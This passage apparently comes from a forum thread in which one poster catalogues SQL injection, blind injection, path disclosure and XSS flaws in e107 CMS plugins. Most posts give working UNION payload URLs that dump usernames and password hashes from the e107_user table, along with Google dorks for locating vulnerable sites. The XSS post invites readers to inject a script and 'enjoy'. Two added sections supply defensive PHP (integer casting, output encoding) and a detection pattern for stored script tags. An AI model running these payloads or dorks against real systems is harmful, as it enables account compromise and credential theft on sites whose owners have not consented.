    $sql->db_Select("clan_listing", "*", "ORDER BY clan_id ASC","");
            while($row = $sql->db_Fetch()){
            $sql2->db_Select("clan_listing_cat", "*", "WHERE clan_cat_id=".$row['clan_cat']."","");

    ...
    Example:
    Code:
    http://e107/e107_plugins/clan_listing/admin_edit.php?edit.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4,5,6%20from%20e107_user--
    
    SQL Injection:
    /Clans.php
    PHP:
    ...
    if (e_QUERY) {
            $tmp = explode('.', e_QUERY);
            $action = $tmp[0];
            $sub_action = $tmp[1];
            $id = $tmp[2];
            unset($tmp);
    }
    ...
    $sql->db_Select("clan_listing_cat", "*", "WHERE clan_cat_id=$sub_action","");
    $catname = $sql->db_Fetch();
    ...
    Example:
    Code:
    http://e107/e107_plugins/clan_listing/Clans.php?det.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4,5,6%20from%20e107_user--
    
    Path:
    http://e107/e107_plugins/clan_listing/admin_menu.php

    Dork: inurl:e107_plugins/clan_listing/
     
  13. Фараон

    AACGC Product Listing V1.4

    SQL Injection:
    /Product_Sub_Categories.php
    PHP:
    ...
    if (e_QUERY) {
            $tmp = explode('.', e_QUERY);
            $action = $tmp[0];
            $sub_action = $tmp[1];
            $id = $tmp[2];
            unset($tmp);
    }

    ...
    $sql->db_Select("product_listing_subcat", "*", "WHERE product_cat=$sub_action ORDER BY product_subcat_name ASC","");
    while($row = $sql->db_Fetch()){
    ...
    Example:
    Code:
    http://e107/e107_plugins/product_listing/Product_Sub_Categories.php?det.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3%20from%20e107_user--
    
    SQL Injection:
    /Products.php
    PHP:
    ...
    if (e_QUERY) {
            $tmp = explode('.', e_QUERY);
            $action = $tmp[0];
            $sub_action = $tmp[1];
            $id = $tmp[2];
            unset($tmp);
    }
    ...
    $sql->db_Select("product_listing", "*", "WHERE product_cat=$sub_action","");
    ...
    Example:
    Code:
    http://e107/e107_plugins/product_listing/Products.php?det.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4%20from%20e107_user--
    
    Path:
    http://e107/e107_plugins/product_listing/Product_Listing_menu.php
    http://e107/e107_plugins/product_listing/admin_menu.php


    Dork: inurl:e107_plugins/product_listing/
     
  14. Фараон

    AACGC Item List V1.4

    SQL Injection:
    /Item_List.php
    PHP:
    ...
    if (e_QUERY) {
            $tmp = explode('.', e_QUERY);
            $action = $tmp[0];
            $sub_action = $tmp[1];
            $id = $tmp[2];
            unset($tmp);
    }
    ...
    if ($action == "det"){

    $sql2->db_Select("aacgc_itemlist_cat", "*", "WHERE item_cat_id=$sub_action","");
    $row2 = $sql2->db_Fetch();
    ...
    Example:
    Code:
    http://e107/e107_plugins/aacgc_itemlist/Item_List.php?det.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3%20from%20e107_user--
    
    SQL Injection:
    /Item_SubCategories.php
    PHP:
    ...
    if (e_QUERY) {
            $tmp = explode('.', e_QUERY);
            $action = $tmp[0];
            $sub_action = $tmp[1];
            $id = $tmp[2];
            unset($tmp);
    }
    ...
    if ($action == "det"){

    $sql2->db_Select("aacgc_itemlist_subcat", "*", "WHERE item_subcat_id=$sub_action","");
    ...
    Example:
    Code:
    http://e107/e107_plugins/aacgc_itemlist/Item_SubCategories.php?det.-1%20union%20select%201,2,concat_ws(0x3a,user_name,user_password),4%20from%20e107_user--
    
    Path:
    http://e107/e107_plugins/aacgc_itemlist/admin_menu.php
    http://e107/e107_plugins/aacgc_itemlist/Recent_Items_menu.php
    http://e107/e107_plugins/aacgc_itemlist/Random_Item_menu.php

    Dork: inurl:e107_plugins/aacgc_itemlist/
     
  15. Фараон

    AACGC Public News V1.4

    SQL Injection:
    /News.php
    PHP:
    ...
    if (e_QUERY) {
            $tmp = explode('.', e_QUERY);
            $action = $tmp[0];
            $sub_action = $tmp[1];
            $id = $tmp[2];
            unset($tmp);
    }
    ...
    $sql ->db_Select("aacgc_pnews_cat", "*", "WHERE news_cat_id = ".$sub_action."","");
    ...
    Example:
    Code:
    http://e107/e107_plugins/aacgc_pnews/News.php?det.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3%20from%20e107_user--
    
    SQL Injection:
    /News_Details.php
    PHP:
    ...
    if (e_QUERY) {
            $tmp = explode('.', e_QUERY);
            $action = $tmp[0];
            $sub_action = $tmp[1];
            $id = $tmp[2];
            unset($tmp);
    }
    ...
    $sql ->db_Select("aacgc_pnews", "*", "WHERE news_id = ".$sub_action."","");
    $row = $sql ->db_Fetch();
    ...
    Example:
    Code:
    http://e107/e107_plugins/aacgc_pnews/News_Details.php?det.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4,5,6,7,8%20from%20e107_user--
    
    Path disclosure:
    http://e107/e107_plugins/aacgc_pnews/pnews_singlecat_menu.php
    http://e107/e107_plugins/aacgc_pnews/pnews_menu.php
    http://e107/e107_plugins/aacgc_pnews/pnews_category_menu.php
    http://e107/e107_plugins/aacgc_pnews/pnews_archive_menu.php
    http://e107/e107_plugins/aacgc_pnews/e_latest.php
    http://e107/e107_plugins/aacgc_pnews/counter.php
    etc...

    Dork: inurl:e107_plugins/aacgc_pnews/
     
  16. Фараон

    AACGC Donation Listing V1.7

    Requires administrator rights. SQL Injection:
    /admin_edit_donator.php
    PHP:
    ...
    if (e_QUERY) {
        $tmp = explode('.', e_QUERY);
        $action = $tmp[0];
        $id = $tmp[1];
        unset($tmp);
    }
    ...
    if ($action == "edit")
    {
        $sql->db_Select("donation_listing", "*", "WHERE don_id= $id", "");
        $row = $sql->db_Fetch();
    ...
    Example:
    Code:
    http://e107/e107_plugins/donation_listing/admin_edit_donator.php?edit.-1%20union%20select%201,2,database(),4,5,6
    
    Requires administrator rights. SQL Injection:
    /admin_edit_month.php
    PHP:
    ...
    if (e_QUERY) {
        $tmp = explode('.', e_QUERY);
        $action = $tmp[0];
        $sub_action = $tmp[1];
        $id = $tmp[2];
        unset($tmp);
    }
    ...
    if ($action == "edit")
    {
        $sql->db_Select("donation_listing_month", "month_id, month_name, year", "month_id = $id");
        $row = $sql->db_Fetch();

        $sql2 = new db;
        $sql2->db_Select("donation_listing_year", "*");
        $rows = $sql2->db_Rows();
        for ($i = 0; $i < $rows; $i++) {
            $option = $sql2->db_Fetch();
            $options .= "<option name='year' value='".$option['year_id']."'>".$option['year_name']."</option>";
        }
    ...
    Example:
    Code:
    http://e107/e107_plugins/donation_listing/admin_edit_month.php?edit.-1%20union%20select%201,database(),3
    
    Path disclosure:
    http://e107/e107_plugins/donation_listing/Current_Donations_menu.php
    http://e107/e107_plugins/donation_listing/Latest_Donations_menu.php
    http://e107/e107_plugins/donation_listing/admin_menu.php

    Nobody needs these bugs, but still..
     
  17. Фараон

    Election v0.5

    SQL Injection:
    /election.php (election_class.php)
    PHP:
    ...
    $candidatelist = $dao->getCandidateList($election->getId());
    ...
          if ($sql->db_Select("user", "user_id, user_name, user_login")) {
             while ($row = $sql->db_Fetch()) {
                $owners[] = array($row["user_id"], $row["user_name"]." (".$row["user_login"].")");
             }
    ...
    Example:
    Code:
    http://e107/e107_plugins/election/election.php?1.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16%20from%20e107_user--
    
    Path disclosure:
    http://e107/e107_plugins/election/admin_menu.php
    http://e107/e107_plugins/election/e_comment.php
    http://e107/e107_plugins/election/e_search.php

    Dork: inurl:e107_plugins/election/
     
  18. Фараон

    RSS Reader v1.10

    Blind SQL Injection:
    /include/getrss.php
    PHP:
    ...
    $q = $_GET["q"];
    ...
    $sql->DB_Select("rss_reader", "rss_feed_addr", "rss_feed_id=".$q);
    ...
    Example:
    Code:
    http://e107/e107_plugins/rss_reader/include/getrss.php?q=2%20and%20substring(version(),1,1)=5
    
    Path disclosure:
    http://e107/e107_plugins/rss_reader/admin_menu.php

    Dork: inurl:e107_plugins/rss_reader/
     
  19. Фараон

    Yellow Pages v2.0 b1

    SQL Injection:
    /yellowpages.php
    Example:
    Code:
    http://e107/e107_plugins/yellowpages/yellowpages.php?1.-2%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4,5,6,7,8,9,10,11,12%20from%20e107_user--
    
    Path disclosure:
    http://e107/e107_plugins/yellowpages/admin_menu.php
    http://e107/e107_plugins/yellowpages/admin_prefs_90.php
    http://e107/e107_plugins/yellowpages/admin_update.php
    http://e107/e107_plugins/yellowpages/e_list.php
    http://e107/e107_plugins/yellowpages/e_search.php
    etc..

    Dork: inurl:e107_plugins/yellowpages/
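    Every injection in the posts above, from the AACGC Item List and Public News plugins through Donation Listing, Election, RSS Reader and Yellow Pages, comes from one construction: a fragment of e_QUERY (or $_GET['q'] in getrss.php) is concatenated into the third argument of db_Select() without ever being turned into a number. The block below is an added example, not code from the thread or from any of the plugins: it puts the vulnerable parsing next to a hardened version that casts every ID with intval() and allow-lists the action. build_where() stands in for the db_Select() argument so the resulting WHERE clause can be inspected offline without a database; safe_id(), parse_query_vulnerable(), parse_query_hardened() and build_where() are my own names, and the two sample payloads are constructed, decoded copies of the ones shown in the posts.

```php
<?php
// Added example, not from the thread or from any of the plugins it covers.
// Reproduces the "action.sub_action.id" handling of e_QUERY seen in the
// AACGC plugins and the $_GET['q'] handling of getrss.php, in vulnerable
// and hardened form. build_where() stands in for the third argument of
// e107's db_Select() so the resulting WHERE clause can be inspected offline.

// Vulnerable: the fragments are used verbatim, exactly as in the posts.
function parse_query_vulnerable(string $e_query): array
{
    $tmp = explode('.', $e_query);
    return [
        'action'     => $tmp[0] ?? '',
        'sub_action' => $tmp[1] ?? '',
        'id'         => $tmp[2] ?? '',
    ];
}

// Cast anything that will be compared with an integer column. intval()
// keeps only the leading numeric part, so "-1 union select ..." becomes -1
// and "2 and substring(...)" becomes 2.
function safe_id($raw): int
{
    return intval($raw);
}

// Hardened: the action comes from an allow-list, IDs are cast at the boundary.
function parse_query_hardened(string $e_query, array $allowed = ['det', 'edit', 'list']): array
{
    $tmp = explode('.', $e_query);
    $action = $tmp[0] ?? '';
    if (!in_array($action, $allowed, true)) {
        $action = 'list';   // unknown action falls back to the default view
    }
    return [
        'action'     => $action,
        'sub_action' => safe_id($tmp[1] ?? 0),
        'id'         => safe_id($tmp[2] ?? 0),
    ];
}

// The concatenation the posts show: "WHERE news_cat_id = ".$sub_action
function build_where(string $column, $value): string
{
    return 'WHERE ' . $column . ' = ' . $value;
}

// Constructed samples in decoded form (the URLs in the posts carry them
// %20-encoded), copied from the payload shapes used above.
$union_payload = 'det.-1 union select 1,concat_ws(0x3a,user_name,user_password),3 from e107_user--';
$blind_q       = '2 and substring(version(),1,1)=5';   // getrss.php?q=...

$v = parse_query_vulnerable($union_payload);
$h = parse_query_hardened($union_payload);

echo 'vulnerable: ' . build_where('news_cat_id', $v['sub_action']) . PHP_EOL;
echo 'hardened:   ' . build_where('news_cat_id', $h['sub_action']) . PHP_EOL;
echo 'vulnerable: ' . build_where('rss_feed_id', $blind_q) . PHP_EOL;
echo 'hardened:   ' . build_where('rss_feed_id', safe_id($blind_q)) . PHP_EOL;
```

    Run it with php from the shell. For the UNION payload the vulnerable line carries the whole injected `union select ... from e107_user--` into the clause, while the hardened line collapses to `WHERE news_cat_id = -1`; for the getrss.php payload the boolean condition `and substring(version(),1,1)=5` disappears the same way. Casting at the parse boundary is sufficient here because every query in the posts compares against an integer column; a string parameter would need proper escaping instead, which none of these posts involve.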
     
  20. Фараон

    Tutor Locator v1.1

    XSS:
    /tutor.php
    PHP:
    {
        $pid = (IsSet($_POST['pid']) ? $_POST['pid'] : 0);
        $tmp = explode(".", e_QUERY);
        $tutor_from = intval($tmp[0]);
        $tutor_action = "item";
        $tutor_itemid = intval($tmp[4]);
        $tutor_com->enter_comment($_POST['author_name'], $_POST['comment'], "tutor", $tutor_itemid, $pid, $_POST['subject']);
        // print $tutor_action.$tutor_itemid;
    }
    At the bottom there is a comment submission form; enter "<script>alert('xss')</script>" and.. enjoy.


    Path disclosure:
    http://e107/e107_plugins/tutor/tutor_top_menu.php

    Dork: inurl:e107_plugins/tutor/
     
    #80 Фараон, 14 Dec 2010
    Last edited: 14 Dec 2010
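    tutor.php already casts the two e_QUERY fragments it uses with intval(), so the SQL side is covered; what reaches enter_comment() unfiltered are the three text fields author_name, subject and comment, and the post shows that the submitted comment is later rendered as live HTML. The page does not show where in Tutor Locator the comment is echoed, so the following added example (not from the thread or the plugin) only demonstrates the output-encoding step that makes the posted payload inert, plus a heuristic for finding comments that were stored before such a fix. encode_for_html(), encode_comment_fields(), render_comment() and has_active_markup() are my own names, the field names are the ones from the page, and the sample submission is constructed.

```php
<?php
// Added example, not from the thread or the Tutor Locator plugin.
// Field names (author_name, subject, comment) are the ones tutor.php
// passes to enter_comment(); everything else here is illustrative.

// Encode a value for an HTML text or double-quoted attribute context.
function encode_for_html(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Normalise and encode the three user-controlled comment fields.
function encode_comment_fields(array $post): array
{
    $out = [];
    foreach (['author_name', 'subject', 'comment'] as $field) {
        $raw = isset($post[$field]) ? (string) $post[$field] : '';
        // Drop C0 control characters (tab, LF and CR are kept) that some
        // browsers tolerate inside tag names, then encode.
        $raw = preg_replace('/[\x00-\x08\x0B\x0C\x0E-\x1F]/', '', $raw);
        $out[$field] = encode_for_html($raw);
    }
    return $out;
}

// Render the encoded fields; every interpolated value has been through
// encode_for_html(), so tags from the submission show up as text.
function render_comment(array $encoded): string
{
    return '<div class="comment"><b>' . $encoded['subject'] . '</b> by '
         . $encoded['author_name'] . '<p>' . $encoded['comment'] . '</p></div>';
}

// Heuristic for auditing rows stored before the fix: flags raw comment
// text containing a risky tag, an inline event handler or a javascript:
// URL. A miss is not proof of safety; it only narrows what to review by hand.
function has_active_markup(string $stored): bool
{
    $pattern = '/<\s*(script|iframe|object|embed|img|svg)\b|\bon[a-z]+\s*=|javascript:/i';
    return (bool) preg_match($pattern, $stored);
}

// Constructed sample submission using the payload from the post.
$sample = [
    'author_name' => 'tester',
    'subject'     => 'hello',
    'comment'     => "<script>alert('xss')</script>",
];

echo render_comment(encode_comment_fields($sample)) . PHP_EOL;
echo (has_active_markup($sample['comment']) ? 'flag' : 'clean') . PHP_EOL;
```

    Run it with php from the shell: the rendered markup contains `&lt;script&gt;` rather than a script element, and the audit helper flags the raw payload. Encoding belongs at the point of output, not only before storage; a comment that is stored encoded and then decoded for editing, or shown through a different template, would otherwise slip through.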